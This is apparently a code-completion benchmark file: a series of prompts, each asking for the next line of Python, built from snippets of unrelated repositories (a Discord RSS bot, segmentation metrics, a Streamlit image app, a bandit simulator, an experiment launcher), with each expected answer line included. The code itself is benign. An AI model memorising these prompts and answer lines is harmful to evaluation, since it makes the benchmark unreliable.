Bot(commands.Bot): def __init__(self) -> None: self.start_time = datetime.datetime.now(datetime.UTC) intents = discord.Intents.all() super().__init__( command_prefix=commands.when_mentioned_or(prefix), intents=intents, help_command=help.HelpMenu(), case_insensitive=True, ) self.session: aiohttp.ClientSession formatter.install("discord", "INFO") formatter.install("bot", "INFO") self.logger = logging.getLogger("discord") self.logger = logging.getLogger("bot") async def setup_hook(self): await self.load_extension("jishaku") await self.load_cogs() async def load_cogs(self): s = time.perf_counter() for file in os.listdir("cogs/"): if file.endswith(".py") and not file.startswith("_"): extension = f"cogs.{file[:-3]}" try: await self.load_extension(extension) self.logger.info(f"Loaded - {extension}") except Exception as e: exception = f"{type(e).__name__}: {e}" self.logger.exception( f"Failed to load extension {extension}. - {exception}") traceback.print_exc() elapsed = time.perf_counter() - s self.logger.info(f"Loaded all extensions - took {elapsed:.2f}s") async def is_owner(self, user: discord.abc.User): if user.id in OWNERS: return True # Else fall back to the original return await super().is_owner(user) async def on_ready(self) -> None: self.session = aiohttp.ClientSession(loop=self.loop) await self.change_presence(activity=discord.Game(name="Free Media Heck Yeah")) self.logger.info("Bot is ready!") # Path: cogs/rss.py from typing import TYPE_CHECKING from discord.ext import commands, tasks from cogs._config import rss_chan_ids from cogs._helpers import fetch_feed from main import Bot from discord.channel import TextChannel if TYPE_CHECKING: class RSSFeeds(commands.Cog): """RSSFeeds commands""" def __init__(self, bot: Bot): self.bot = bot @commands.Cog.listener() async def on_ready(self): self.send_rss.start() async def cog_before_invoke(self, ctx): """Triggers typing indicator on Discord before every command.""" await ctx.channel.typing() return @tasks.loop(seconds=300) async def send_rss(self):
for msg in fetch_feed():
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: cvlab-yonsei/RankMixup # Path: calibrate/evaluation/evaluator.py class DatasetEvaluator(metaclass=ABCMeta): """ Base class for a dataset evaluator """ @abstractmethod def reset(self): """ Preparation for a new round of evaluation. Should be called before starting a round of evaluation. """ pass @abstractmethod def update(self): """ Update status given a mini-batch results """ pass def curr_score(self): """ Return curr score after last batch """ pass @abstractmethod def mean_score(self): """ Return mean score across all classes/samples """ pass def class_score(self): """ Return score for different classes """ pass @abstractmethod def num_samples(self): """ return the evaluated samples """ pass @abstractmethod def main_metric(self): "return the name of the main metric" pass # Path: calibrate/utils/constants.py EPS: float = 1e-10 # Path: calibrate/evaluation/segment_evaluator.py import logging import numpy as np import pandas as pd import wandb from terminaltables import AsciiTable from typing import List, Optional from .evaluator import DatasetEvaluator from calibrate.utils.constants import EPS logger = logging.getLogger(__name__) def intersect_and_union(pred_label, label, num_classes, ignore_index): mask = (label != ignore_index) pred_label = pred_label[mask] label = label[mask] intersect = pred_label[pred_label == label] area_intersect, _ = np.histogram( intersect, bins=np.arange(num_classes + 1) ) area_pred_label, _ = np.histogram( pred_label, bins=np.arange(num_classes + 1) ) area_label, _ = np.histogram( label, bins=np.arange(num_classes + 1) ) area_union = area_pred_label + area_label - area_intersect return area_intersect, area_union, area_pred_label, area_label class SegmentEvaluator(DatasetEvaluator): def __init__(self, classes: Optional[List[str]] = None, ignore_index: int = -1) -> None: super().__init__() self.classes = classes self.num_classes = len(self.classes) self.ignore_index = ignore_index def num_samples(self): return self.nsamples def reset(self): self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float) self.nsamples = 0 def main_metric(self): return "miou" def ignore_background(self, pred: np.ndarray, target: np.ndarray): pred = pred[:, 1:] if pred.shape[1] > 1 else pred target = target[:, 1:] if target.shape[1] > 1 else target return pred, target def update(self, pred: np.ndarray, target: np.ndarray): """Update all the metric from batch size prediction and target. Args: pred: predictions to be evaluated in one-hot formation y: ground truth. It should be one-hot format. """ assert pred.shape == target.shape, "pred and target should have same shapes" n = pred.shape[0] self.nsamples += n batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float) batch_area_union = np.zeros((self.num_classes, ), dtype=np.float) batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float) batch_area_target = np.zeros((self.num_classes, ), dtype=np.float) for i in range(n): area_inter, area_union, area_pred, area_target = ( intersect_and_union( pred[i], target[i], self.num_classes, self.ignore_index ) ) batch_area_inter += area_inter batch_area_union += area_union batch_area_pred += area_pred batch_area_target += area_target
iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: CaptainCook4D/downloader # Path: util.py def prepare_gopro_2d_output_directory(args, output_dir: Path): output_dir.mkdir(parents=True, exist_ok=True) data_directory = output_dir / Constants.CAPTAIN_COOK_4D data_directory.mkdir(parents=True, exist_ok=True) gopro_data_directory = data_directory / Constants.GOPRO gopro_data_directory.mkdir(parents=True, exist_ok=True) if args.resolution4K: resolution_4K_directory = gopro_data_directory / Constants.RESOLUTION_4K resolution_4K_directory.mkdir(parents=True, exist_ok=True) resolution_360p_directory = gopro_data_directory / Constants.RESOLUTION_360P resolution_360p_directory.mkdir(parents=True, exist_ok=True) return data_directory # Path: util.py class Constants: CAPTAIN_COOK_4D = "captain_cook_4d" GOPRO = "gopro" HOLOLENS = "hololens" GOPRO_RESOLUTION_4K = "gopro_4k" GOPRO_RESOLUTION_360P = "gopro_360p" DATA_2D = "data_2d" RESOLUTION_360P = "resolution_360p" RESOLUTION_4K = "resolution_4k" RAW = "raw" SYNC = "sync" SPATIAL = "spatial" PV = "pv" MC = "mc" AB_ZIP = "ab.zip" DEPTH_ZIP = "depth.zip" FRAMES_ZIP = "frames.zip" DEPTH_AHAT = "depth_ahat" DEPTH = "depth" AB = "ab" DEPTH_POSE = "depth_pose" PV_POSE = "pv_pose" SPATIAL_POSE = "spatial_pose" IMU = "imu" DEPTH_POSE_PKL = "depth_pose_pkl" PV_POSE_PKL = "pv_pose_pkl" SPATIAL_POSE_PKL = "spatial_pkl" IMU_MAGNETOMETER = "imu_magnetometer" IMU_GYROSCOPE = "imu_gyroscope" IMU_ACCELEROMETER = "imu_accelerometer" IMU_ACCELEROMETER_PKL = "imu_accelerometer_pkl" IMU_GYROSCOPE_PKL = "imu_gyroscope_pkl" IMU_MAGNETOMETER_PKL = "imu_magnetometer_pkl" IS_HOLOLENS_ENABLED = "is_hololens_enabled" IS_SPATIAL_ENABLED = "is_spatial_enabled" DATA_JSON = "data_json" HOLOLENS_DEVICE_INFO = "hololens_device_info" RECORDING_ID = "recording_id" METADATA = "metadata" DOWNLOAD_LINKS = "download_links" FILE_SIZES = "file_sizes" RECORDING = "recording" HOLOLENS_RAW_PV_FRAMES_ZIP = "hololens_raw_pv_frames_zip" HOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = "hololens_raw_depth_ahat_ab_zip" HOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = "hololens_raw_depth_ahat_depth_zip" HOLOLENS_RAW_MC_PKL = "hololens_raw_mc_pkl" HOLOLENS_SYNC_PV_FRAMES_ZIP = "hololens_sync_pv_frames_zip" HOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = "hololens_sync_depth_ahat_ab_zip" HOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = "hololens_sync_depth_ahat_depth_zip" HOLOLENS_SYNC_PV_VIDEO = "hololens_sync_pv_video" HOLOLENS_RAW_SPATIAL_PKL = "hololens_raw_spatial_pkl" HOLOLENS_RAW_IMU_MAGNETOMETER_PKL = "hololens_raw_imu_magnetometer_pkl" HOLOLENS_RAW_IMU_GYROSCOPE_PKL = "hololens_raw_imu_gyroscope_pkl" HOLOLENS_RAW_IMU_ACCELEROMETER_PKL = "hololens_raw_imu_accelerometer_pkl" HOLOLENS_SYNC_SPATIAL_PKL = "hololens_sync_spatial_pkl" HOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = "hololens_sync_imu_magnetometer_pkl" HOLOLENS_SYNC_IMU_GYROSCOPE_PKL = "hololens_sync_imu_gyroscope_pkl" HOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = "hololens_sync_imu_accelerometer_pkl" HOLOLENS_RAW_PV_POSE_PKL = "hololens_raw_pv_pose_pkl" HOLOLENS_SYNC_PV_POSE_PKL = "hololens_sync_pv_pose_pkl" HOLOLENS_RAW_DEPTH_POSE_PKL = "hololens_raw_depth_pose_pkl" HOLOLENS_SYNC_DEPTH_POSE_PKL = "hololens_sync_depth_pose_pkl" DURATION = "duration" # Path: util.py def download_data(download_url_links, download_file_paths): # ---- DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ---- with ThreadPoolExecutor(max_workers=3) as executor: results = list( tqdm( executor.map( download_url, zip(download_url_links, download_file_paths) ), total=len(download_url_links) ) ) return results # Path: download_gopro_data.py import argparse import json from pathlib import Path from util import prepare_gopro_2d_output_directory, Constants, download_data def process_download_gopro_data(download_args): # ---- Parse Download Links Json ---- with open("metadata/download_links.json", "r") as f: download_links = json.load(f) output_dir = Path(download_args.output_dir)
data_directory = prepare_gopro_2d_output_directory(download_args, output_dir)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: mjavadpur/Sadtalker_LongVideos # Path: src/audio2pose_models/cvae.py class CVAE(nn.Module): def __init__(self, cfg): super().__init__() encoder_layer_sizes = cfg.MODEL.CVAE.ENCODER_LAYER_SIZES decoder_layer_sizes = cfg.MODEL.CVAE.DECODER_LAYER_SIZES latent_size = cfg.MODEL.CVAE.LATENT_SIZE num_classes = cfg.DATASET.NUM_CLASSES audio_emb_in_size = cfg.MODEL.CVAE.AUDIO_EMB_IN_SIZE audio_emb_out_size = cfg.MODEL.CVAE.AUDIO_EMB_OUT_SIZE seq_len = cfg.MODEL.CVAE.SEQ_LEN self.latent_size = latent_size self.encoder = ENCODER(encoder_layer_sizes, latent_size, num_classes, audio_emb_in_size, audio_emb_out_size, seq_len) self.decoder = DECODER(decoder_layer_sizes, latent_size, num_classes, audio_emb_in_size, audio_emb_out_size, seq_len) def reparameterize(self, mu, logvar): std = torch.exp(0.5 * logvar) eps = torch.randn_like(std) return mu + eps * std def forward(self, batch): batch = self.encoder(batch) mu = batch['mu'] logvar = batch['logvar'] z = self.reparameterize(mu, logvar) batch['z'] = z return self.decoder(batch) def test(self, batch): ''' class_id = batch['class'] z = torch.randn([class_id.size(0), self.latent_size]).to(class_id.device) batch['z'] = z ''' return self.decoder(batch) # Path: src/audio2pose_models/discriminator.py class PoseSequenceDiscriminator(nn.Module): def __init__(self, cfg): super().__init__() self.cfg = cfg leaky = self.cfg.MODEL.DISCRIMINATOR.LEAKY_RELU self.seq = nn.Sequential( ConvNormRelu('1d', cfg.MODEL.DISCRIMINATOR.INPUT_CHANNELS, 256, downsample=True, leaky=leaky), # B, 256, 64 ConvNormRelu('1d', 256, 512, downsample=True, leaky=leaky), # B, 512, 32 ConvNormRelu('1d', 512, 1024, kernel_size=3, stride=1, padding=1, leaky=leaky), # B, 1024, 16 nn.Conv1d(1024, 1, kernel_size=3, stride=1, padding=1, bias=True) # B, 1, 16 ) def forward(self, x): x = x.reshape(x.size(0), x.size(1), -1).transpose(1, 2) x = self.seq(x) x = x.squeeze(1) return x # Path: src/audio2pose_models/audio_encoder.py class AudioEncoder(nn.Module): def __init__(self, wav2lip_checkpoint, device): super(AudioEncoder, self).__init__() self.audio_encoder = nn.Sequential( Conv2d(1, 32, kernel_size=3, stride=1, padding=1), Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1), Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(64, 128, kernel_size=3, stride=3, padding=1), Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1), Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(256, 512, kernel_size=3, stride=1, padding=0), Conv2d(512, 512, kernel_size=1, stride=1, padding=0),) #### load the pre-trained audio_encoder, we do not need to load wav2lip model here. # wav2lip_state_dict = torch.load(wav2lip_checkpoint, map_location=torch.device(device))['state_dict'] # state_dict = self.audio_encoder.state_dict() # for k,v in wav2lip_state_dict.items(): # if 'audio_encoder' in k: # state_dict[k.replace('module.audio_encoder.', '')] = v # self.audio_encoder.load_state_dict(state_dict) def forward(self, audio_sequences): # audio_sequences = (B, T, 1, 80, 16) B = audio_sequences.size(0) audio_sequences = torch.cat([audio_sequences[:, i] for i in range(audio_sequences.size(1))], dim=0) audio_embedding = self.audio_encoder(audio_sequences) # B, 512, 1, 1 dim = audio_embedding.shape[1] audio_embedding = audio_embedding.reshape((B, -1, dim, 1, 1)) return audio_embedding.squeeze(-1).squeeze(-1) #B seq_len+1 512 # Path: src/audio2pose_models/audio2pose.py import torch from torch import nn from src.audio2pose_models.cvae import CVAE from src.audio2pose_models.discriminator import PoseSequenceDiscriminator from src.audio2pose_models.audio_encoder import AudioEncoder class Audio2Pose(nn.Module): def __init__(self, cfg, wav2lip_checkpoint, device='cuda'): super().__init__() self.cfg = cfg self.seq_len = cfg.MODEL.CVAE.SEQ_LEN self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE self.device = device self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device) self.audio_encoder.eval() for param in self.audio_encoder.parameters(): param.requires_grad = False self.netG = CVAE(cfg)
self.netD_motion = PoseSequenceDiscriminator(cfg)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Angryrou/udao # Path: udao/data/containers/tabular_container.py class TabularContainer(BaseContainer): """Container for tabular data, stored in DataFrame format.""" data: pd.DataFrame def get(self, key: str) -> np.ndarray: return self.data.loc[key].values # type: ignore # Path: udao/data/iterators/base_iterator.py class UdaoIterator(BaseIterator[Tuple[UT, th.Tensor], UST], Generic[UT, UST]): """Base iterator for the Udao use case, where the iterator returns a FeatureInput object. It is expected to accept: - a TabularContainer representing the tabular features which can be set as variables by the user in the optimization pipeline - a TabularContainer representing the objectives FST: Type of the iterator output shape - in the Udao case, restricted to FeatureInputShape and its subclasses. FT: Type of the iterator output - in the Udao case, restricted to th.Tensor and its subclasses This results in a type Tuple[UT, th.Tensor] for the iterator output. Parameters ---------- keys : Sequence[str] Keys of the dataset, used for accessing all features tabular_features : TabularContainer Tabular features of the iterator objectives : TabularContainer Objectives of the iterator """ def __init__( self, keys: Sequence[str], tabular_features: TabularContainer, objectives: TabularContainer, ) -> None: super().__init__(keys) self.tabular_features = tabular_features self.objectives = objectives def get_tabular_features_container( self, feature_input: th.Tensor ) -> TabularContainer: indices = [ i for i, name in enumerate(self.shape.feature_names) if name in self.tabular_features.data.columns ] tabular_features = feature_input[:, indices] tabular_df = pd.DataFrame( tabular_features.cpu().numpy(), columns=self.tabular_features.data.columns ) return TabularContainer(tabular_df) # Path: udao/utils/interfaces.py class UdaoEmbedInput(Generic[T], UdaoInput): embedding_input: T def to(self, device: th.device) -> "UdaoEmbedInput": if hasattr(self.embedding_input, "to"): return UdaoEmbedInput( self.embedding_input.to(device), self.features.to(device) # type: ignore ) else: return UdaoEmbedInput( self.embedding_input, self.features.to(device) # type: ignore ) # Path: udao/utils/interfaces.py class UdaoEmbedItemShape(Generic[ST], UdaoItemShape): embedding_input_shape: ST # Path: udao/utils/interfaces.py class UdaoInput: features: th.Tensor def to(self, device: th.device) -> "UdaoInput": return UdaoInput(self.features.to(device)) # Path: udao/utils/interfaces.py class UdaoItemShape: feature_names: list[str] output_names: list[str] # Path: udao/data/tests/iterators/dummy_udao_iterator.py from typing import Sequence, Tuple from ....data.containers.tabular_container import TabularContainer from ....data.iterators.base_iterator import UdaoIterator from ....utils.interfaces import ( UdaoEmbedInput, UdaoEmbedItemShape, UdaoInput, UdaoItemShape, ) import torch as th class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]): def __init__( self, keys: Sequence[str], tabular_features: TabularContainer, objectives: TabularContainer, ) -> None: super().__init__(keys, tabular_features=tabular_features, objectives=objectives) def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]: key = self.keys[idx] return ( UdaoInput( th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype) ), th.tensor(self.objectives.get(key), dtype=self.tensors_dtype), ) @property def shape(self) -> UdaoItemShape: return UdaoItemShape( feature_names=list(self.tabular_features.data.columns), output_names=list(self.objectives.data.columns), ) @staticmethod def collate( items: Sequence[Tuple[UdaoInput, th.Tensor]] ) -> Tuple[UdaoInput, th.Tensor]: features = UdaoInput(th.vstack([item[0].features for item in items])) objectives = th.vstack([item[1] for item in items]) return features, objectives
class DummyUdaoEmbedIterator(UdaoIterator[UdaoEmbedInput, UdaoEmbedItemShape]):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: SnailForce/SIM-Net # Path: data/base_dataset.py class BaseDataset(data.Dataset, ABC): """This class is an abstract base class (ABC) for datasets. To create a subclass, you need to implement the following four functions: -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt). -- <__len__>: return the size of dataset. -- <__getitem__>: get a data point. -- <modify_commandline_options>: (optionally) add dataset-specific options and set default options. """ def __init__(self, opt): """Initialize the class; save the options in the class Parameters: opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions """ self.opt = opt self.root = opt.dataroot @staticmethod def modify_commandline_options(parser, is_train): """Add new dataset-specific options, and rewrite default values for existing options. Parameters: parser -- original option parser is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options. Returns: the modified parser. """ return parser @abstractmethod def __len__(self): """Return the total number of images in the dataset.""" return 0 @abstractmethod def __getitem__(self, index): """Return a data point and its metadata information. Parameters: index - - a random integer for data indexing Returns: a dictionary of data with their names. It ususally contains the data itself and its metadata information. """ pass # Path: data/base_dataset.py def get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True): transform_list = [] if grayscale: transform_list.append(transforms.Grayscale(1)) if 'resize' in opt.preprocess: osize = [opt.load_size, opt.load_size] transform_list.append(transforms.Resize(osize, method)) elif 'scale_width' in opt.preprocess: transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, opt.crop_size, method))) if 'crop' in opt.preprocess: if params is None: transform_list.append(transforms.RandomCrop(opt.crop_size)) else: transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size))) if opt.preprocess == 'none': transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method))) if not opt.no_flip: if params is None: transform_list.append(transforms.RandomHorizontalFlip()) elif params['flip']: transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip']))) if convert: transform_list += [transforms.ToTensor()] # if grayscale: # transform_list += [transforms.Normalize((0.5,), (0.5,))] # else: # transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))] return transforms.Compose(transform_list) # Path: data/image_folder.py def make_dataset_by_name(dir, max_dataset_size=float("inf")): images = [] assert os.path.isdir(dir), '%s is not a valid directory' % dir for root, _, fnames in sorted(os.walk(dir)): for fname in fnames: if is_image_file(fname): # path = os.path.join(root, fname) images.append(fname) return images[:min(max_dataset_size, len(images))] # Path: data/mask_dataset.py import os,yaml import torch.nn.functional as F import random import numpy as np import collections import torch from data.base_dataset import BaseDataset, get_transform from data.image_folder import make_dataset_by_name from PIL import Image,ImageFilter class MaskDataset(BaseDataset): def __init__(self, opt): """Initialize this dataset class. Parameters: opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions """ BaseDataset.__init__(self, opt) self.root_dir = os.path.join(opt.dataroot,'class') self.phase = opt.phase self.img_mask_dict = {} self.img_names = {} self.data_size = {} self.label_list = os.listdir(os.path.join(self.root_dir)) # The shape of the human face is more complex, so increase the training ratio if "face" in self.label_list: self.label_list.append("face") for label in self.label_list: label_dir = os.path.join(self.root_dir,label,"images") with open(os.path.join(self.root_dir,label,'list.yaml')) as f: self.img_mask_dict[label] = yaml.safe_load(f) self.img_names[label] = list(self.img_mask_dict[label].keys()) self.data_size[label] = len(self.img_names[label])
self.transform = get_transform(self.opt)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: adarshsankarrs/PhotoshopApp # Path: multiapp.py class MultiApp: """Framework for combining multiple streamlit applications. """ def __init__(self): self.apps = [] def add_app(self, title, func): """Adds a new application. """ self.apps.append({ "title": title, "function": func }) def run(self): # app = st.sidebar.radio( app = st.sidebar.selectbox( 'Select from the options', self.apps, format_func=lambda app: app['title']) app['function']() # Path: apps/home.py def app(): # Path: apps/sketch.py DEMO_IMAGE = 'imgs/Tiger.jpg' def app(): def img2sketch(photo, k_size): # Path: apps/inpaint.py def app(): def inpaintt(img,mask): DEMO_IMAGE = 'imgs/impai.png' DEMO_IMAGE_MASK = 'imgs/maskn.png' # Path: apps/stadap.py def app(): def adap(img): DEMO_IMAGE = 'imgs/scannedimg.jpeg' # Path: apps/textonimg.py DEMO_IMAGE = 'imgs/Tiger.jpg' def app(): def imgtext(photo, text): # Path: apps/Edge_Cont.py def app(): def load_image(filename): def photo(): DEMO_IMAGE = 'imgs/Tiger.jpg' # Path: apps/Face_detect.py def app(): def face_detection(): DEMO_IMAGE = 'imgs/Person.jpg' # Path: apps/Crop.py def app(): # Path: apps/filters.py def app(): def load_image(): def img2bright(photo): def img2enh(photo): def img2inv(photo): def gamma_function1(channel, gamma): def img2sum(photo): def gamma_function2(channel, gamma): def img2win(photo): def img2sepia(photo): def hsv(img, l, u): def img2splash(photo): def img2cont(photo): def img2emb(photo): def tv_60(photo): def img2cartoon(photo): def img2sketch(photo, k_size): def exponential_function(channel, exp): def img2tone(img, number): def img2day(photo): def img2pen(photo): def comic(photo): DEMO_IMAGE = 'imgs/Tiger.jpg' SP_DEMO_IMAGE = 'imgs/ball.jpg' SP_IMAGE = 'imgs/Splash.jpg' # Path: apps/abtus.py def app(): # Path: apps/Feature_detect.py DEMO_IMAGE = 'imgs/Person.jpg' def app(): def load_image(): def feature_detection(): # Path: app.py import streamlit as st import numpy as np import pandas as pd import cv2 from PIL import Image, ImageOps from multiapp import MultiApp from apps import home,sketch,inpaint,stadap,textonimg,Edge_Cont,Face_detect,Crop,filters,abtus,Feature_detect app = MultiApp() # option = st.selectbox( # 'Select from the options', # ('Home', 'Filters', 'Doc scanner','add text'), key = 1) # if(option=='Filters'): # opt = st.selectbox( # 'Select from the options', # ('sepia', 'Filter1', 'filter2','filter3'), key = 2) # Add all your application here app.add_app("Home", home.app) app.add_app("Add filters to image", filters.app) app.add_app("Sketch", sketch.app) app.add_app("Image inpainting", inpaint.app) app.add_app("Doc Scanner", stadap.app) app.add_app("Add Title to image", textonimg.app) app.add_app("Crop an Image", Crop.app) app.add_app("Edge and Contour detection ", Edge_Cont.app)
app.add_app("Face detection", Face_detect.app)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: DURUII/Replica-AUCB # Path: arms.py class StrategicArm(NormalArm): c_min, c_max = 0.1, 1 def __init__(self): # in the paper, r is expected reward r = random.uniform(0.1, 1) # to make that sample value is within 0~1 with 97% sigma = random.uniform(0, min(r / 3, (1 - r) / 3)) super().__init__(r, sigma) # c for cost, b for bid, c_i = b_i according to the theorem 2 self.c = random.uniform(0.1, 1) self.b = self.c # Path: config.py class Config: N = 60 N_range = [50, 60, 70, 80, 90, 100] K = 20 K_range = [10, 20, 30, 40, 50] B = 5e5 B_range = [i * 10 for i in range(1, 11)] B_range = np.array(B_range) * 1e4 line_styles = { 'AUCB': {'color': '#060506', 'marker': 's', 'label': 'AUCB'}, 'optimal': {'color': '#ed1e25', 'marker': 'o', 'label': 'optimal'}, 'separated': {'color': '#3753a4', 'marker': '^', 'label': 'separated'}, '0.1-first': {'color': '#097f80', 'marker': 'v', 'label': '0.1-first'}, '0.5-first': {'color': '#ba529e', 'marker': '<', 'label': '0.5-first'}, } # bar style bar_width = 0.15 bar_styles = { 'AUCB': {'color': '#060506', 'label': 'AUCB', 'hatch': ''}, 'optimal': {'color': '#ed1e25', 'label': 'optimal', 'hatch': '||||'}, 'separated': {'color': '#3753a4', 'label': 'separated', 'hatch': '/////'}, '0.1-first': {'color': '#097f80', 'label': '0.1-first', 'hatch': '\\\\\\\\\\'}, '0.5-first': {'color': '#ba529e', 'label': '0.5-first', 'hatch': '---'}, } # Path: emulator.py class Emulator: algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first'] def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5): self.N = n_arms self.K = n_selected self.B = budget self.arms = arms if arms is None: self.arms = [StrategicArm() for _ in range(self.N)] self.name2sol = {} def build(self): for algo in Emulator.algorithms: if algo == 'AUCB': self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B) elif algo == 'optimal': self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B) elif algo == 'separated': self.name2sol[algo] = Separated(self.arms, self.N, self.K, self.B) elif algo.endswith('-first'): self.name2sol[algo] = EpsilonFirst(self.arms, self.N, self.K, self.B, float(algo[:-6])) def simulate(self): self.build() name2res = {name: None for name in self.name2sol.keys()} for name in name2res.keys(): # instance of an algorithm solver = self.name2sol[name] solver.initialize() name2res[name] = solver.run() return name2res # Path: main.py import os import pandas as pd import numpy as np import pickle from matplotlib import pyplot as plt from tqdm import tqdm from arms import StrategicArm from config import Config from emulator import Emulator """ Author: DURUII Date: 2023/12/17 """ plt.style.use(['science', 'grid']) config = Config # data preparation if not os.path.exists('./runs.pkl'): data = [] for X in ['N', 'K', 'B']: for x in tqdm(eval(f'config.{X}_range'), desc=X): if X == 'N':
name2res = Emulator(n_arms=x).simulate()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: XLearning-SCU/2023-TPAMI-SMILE # Path: _MainLauncher.py def get_settings(): def clear_gpu_fail(root): def run(): def main(): # Path: _Utils/Launcher.py class Launcher(SubprocessOperator): def __init__(self, path_operator, env_config='', queue=None): self.path_operator = path_operator self.env_config = env_config self.queue = queue def show_tensorboard(self, path_to_runs): python_path = self.path_operator.python_path tensorboard_path = os.path.join(os.path.dirname(python_path), 'tensorboard') # self.__call__(cmd='find \'{}\' | grep tfevents'.format(path_to_runs)) # self.__call__(cmd='{} {} --inspect --logdir \'{}\''.format(python_path, tensorboard_path, path_to_runs)) self.__call__(cmd='{} {} --logdir \'{}\' {}'.format( python_path, tensorboard_path, path_to_runs, self.path_operator.tensorboard_arg)) def launch(self, cfg, run_file="main.py", safe_mode=True, model_name='Train', clean_fold=True): fold_path = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3) if os.path.exists(os.path.join(fold_path, 'Checkpoints')): warnings.warn('There are some checkpoints in "{}".'.format(fold_path)) if clean_fold: DirectoryOperator.FoldOperator(directory=fold_path).clear(delete_root=False, not_to_delete_file=safe_mode) code_root = os.path.join(fold_path, '{}Code'.format(model_name)) # if sys.platform != 'win32': # code_root = '"{}"'.format(code_root) DirectoryOperator.FoldOperator(directory='./').copy( dst_fold=code_root, not_to_delete_file=safe_mode, ignore=ignore_patterns('__pycache__', '.idea', '_bac')) python_cmd = '{} -u {} {}'.format( self.path_operator.python_path, # np.random.randint(0,1000), run_file, cfg.get_config(), ) txt_path = '"{:}.txt"'.format(os.path.join(fold_path, model_name)) if sys.platform != 'win32': py_cmd = "{append_config:} nohup {python_cmd:} > {txt_path:} 2>&1 &".format( append_config=self.env_config + ' CUDA_VISIBLE_DEVICES={}'.format(cfg.cuda), python_cmd=python_cmd, txt_path=txt_path, ) else: py_cmd = "start /b {python_cmd:} > {txt_path:} 2>&1".format( python_cmd=python_cmd, txt_path=txt_path, ) self.__call__( cmd="cd \"{code_root:}\" && {py_cmd:}".format( code_root=code_root, py_cmd=py_cmd, ) ) def quick_launch(self, settings, config_operator, **kwargs): """ settings: [cuda, [yaml_list], arg_dict] """ timer = Timer() total_count = len(settings) for cuda, yaml_list, arg_dict in settings: t_start = time.time() cfg = config_operator( yaml_list=yaml_list, cuda=cuda, **arg_dict, ) work_root = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3) if os.path.exists(work_root): print("Skipping a code running due to its log already exists. work_root == {}".format(work_root)) total_count -= 1 continue if self.queue is not None: self.queue.enqueue(work_root=work_root, cuda=cuda) self.launch( cfg=cfg, **kwargs ) timer.update(time.time()-t_start) timer.count -= 1 timer.show(total_count=total_count) timer.count += 1 if self.queue is not None: self.queue.close() # Path: _Utils/ConfigOperator.py class ConfigOperator: def __init__(self, cuda, yaml_list=None, **kwargs): self.config = 